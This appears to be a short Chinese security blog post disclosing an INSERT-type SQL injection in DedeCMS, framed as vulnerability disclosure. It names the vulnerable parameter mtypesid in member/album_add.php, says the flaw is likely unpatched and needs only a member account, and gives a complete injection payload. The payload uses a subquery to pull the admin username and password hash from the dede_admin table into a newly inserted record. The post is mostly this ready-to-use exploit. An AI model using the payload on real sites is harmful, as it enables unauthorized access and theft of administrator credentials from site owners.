Dedecms某一处insert型注入

    Dedecms一处注入,较鸡肋,之前变量覆盖的漏洞太轰动了,所以一直没发出,之前5月份最新版本测试的,目前最新版本应该是没修复的
    漏洞需要会员,所以比较鸡肋啦!
    发表文章处,post表单的mtypesid可以注入

    /dedecmsnew/member/album_add.php
    注入的代码:

    mtypesid=1'),("'",'0','1367930810','p','0','2','-1','0','0',(SELECT concat(userid,0x5f,pwd,0x5f) FROM dede_admin where userid='admin'),'',
    '','12333','','','1367930810','1367930810','4','image','test','3')#@`'`'

     

    Dedecms某一处insert型注入

    本博客所有文章如无特别注明均为原创。
    复制或转载请以超链接形式注明转自n0elle's Blog,原文地址《Dedecms某一处insert型注入
    标签:
    喜欢 | 0
    分享:

还没有人抢沙发呢~